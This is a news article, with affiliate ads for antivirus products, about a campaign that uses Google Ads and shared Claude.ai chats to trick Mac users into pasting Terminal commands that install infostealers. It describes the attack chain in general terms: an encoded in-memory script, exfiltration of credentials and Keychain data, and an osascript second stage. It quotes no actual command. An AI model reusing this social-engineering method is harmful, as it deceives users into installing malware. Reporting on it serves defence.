Hackers abuse Google ads, Claude.ai chats to push Mac malware

Cybercriminals are actively exploiting Google Ads and shared Claude.ai chat features to deliver malware to Mac users, with researchers confirming malicious instructions embedded in publicly accessible chats that lead to malware downloads.

Researchers from Trendyol Group and BleepingComputer have identified active campaigns where attackers use Google Ads to direct users searching for “Claude Mac download” to legitimate-looking Claude.ai pages. However, these pages host shared chat conversations containing social engineering schemes that instruct users to open Terminal and paste commands, resulting in silent malware downloads.

One such shared chat, attributed to “Apple Support,” guides users through opening Terminal and executing a command that fetches a base64-encoded shell script. This script runs in memory, avoiding detection, and checks for specific regional keyboard settings before proceeding. If the check passes, it collects system information, exfiltrates it, and downloads a second-stage payload executed via macOS’s osascript, giving attackers remote control.

In some variants, the script directly exfiltrates browser credentials, cookies, and Keychain data, indicating targeted information theft. The malware variants include a known macOS infostealer called MacSync, with some versions skipping fingerprinting and targeting credentials directly. Both campaigns use polymorphic payloads, making detection difficult based on static signatures.

Why It Matters

This development underscores the evolving threat landscape where AI platforms and legitimate advertising channels are exploited for malware distribution. The use of shared chats on AI platforms like Claude.ai, combined with malvertising, presents new challenges for cybersecurity defenses and highlights the importance of cautious behavior when executing terminal commands from unverified sources. For Mac users, this campaign demonstrates that even trusted AI tools can be weaponized, emphasizing the need for vigilance and direct downloads from official sources.

Mac Mini Logic Board Removal Tool (2010-2018 Models)

High strength quality, metal construction

AmazonView Latest Price

As an affiliate, we earn on qualifying purchases.

As an affiliate, we earn on qualifying purchases.

Background

Malvertising campaigns have long been used to distribute malware, often via fake or compromised websites. Recent reports have shown attackers exploiting popular search engines and advertising platforms to redirect users to malicious sites. AI platforms like ChatGPT and Grok have previously been targeted for similar campaigns. This campaign marks a notable escalation by embedding malicious instructions directly within shared chat features on Claude.ai, a prominent AI service, leveraging its legitimate infrastructure for malicious purposes.

“We found shared Claude chats that contain social engineering instructions prompting users to paste commands into Terminal, which then silently downloads and runs malware on their Mac.”

— BleepingComputer researcher

“The malicious chats are hosted on publicly accessible links, and they use sophisticated techniques like polymorphic payloads to evade detection.”

— TrendYol security engineer Berk Albayrak

McAfee Total Protection 5-Device | AntiVirus Software 2026 for Windows PC & Mac, AI Scam Detection, VPN, Password Manager, Identity Monitoring | 1-Year Subscription with Auto-Renewal | Download

DEVICE SECURITY – Award-winning McAfee antivirus, real-time threat protection, protects your data, phones, laptops, and tablets

AmazonView Latest Price

As an affiliate, we earn on qualifying purchases.

As an affiliate, we earn on qualifying purchases.

What Remains Unclear

It remains unclear how widespread the campaign is, whether additional variants exist, or if other AI platforms are similarly targeted. The full scope of affected users and the exact methods used for initial infection via Google Ads are still being investigated.

McAfee Total Protection 5-Device | AntiVirus Software 2026 for Windows PC & Mac, AI Scam Detection, VPN, Password Manager, Identity Monitoring | 1-Year Subscription with Auto-Renewal | Download

DEVICE SECURITY – Award-winning McAfee antivirus, real-time threat protection, protects your data, phones, laptops, and tablets

AmazonView Latest Price

As an affiliate, we earn on qualifying purchases.

As an affiliate, we earn on qualifying purchases.

What’s Next

Security researchers plan to monitor ongoing campaigns, analyze new variants, and work with Google and AI platform providers to block malicious ads and shared chat links. Users are advised to avoid executing terminal commands from unverified sources and to download software only from official channels.

Norton 360 Premium 2026 Ready, Antivirus software for 10 Devices with Auto-Renewal – Includes Advanced AI Scam Protection, VPN, Dark Web Monitoring & PC Cloud Backup [Download]

ONGOING PROTECTION Download instantly & install protection for 10 PCs, Macs, iOS or Android devices in minutes!

AmazonView Latest Price

As an affiliate, we earn on qualifying purchases.

As an affiliate, we earn on qualifying purchases.

Key Questions

How can I avoid falling victim to this malware campaign?

Always verify the source before executing terminal commands, avoid clicking on suspicious ads, and download software only from official websites or app stores.

Is my Mac at risk if I visited a malicious Claude.ai chat?

If you followed instructions to paste commands into Terminal from a shared chat, your system could be compromised. It is recommended to run security scans and review system activity.

How are attackers using Google Ads in this campaign?

They are creating sponsored search results that appear to link to legitimate Claude.ai pages but instead direct users to malicious shared chat links containing malware instructions.

Will this affect non-Mac users?

This specific campaign targets Mac users with malware designed for macOS. However, similar tactics could be adapted for other platforms.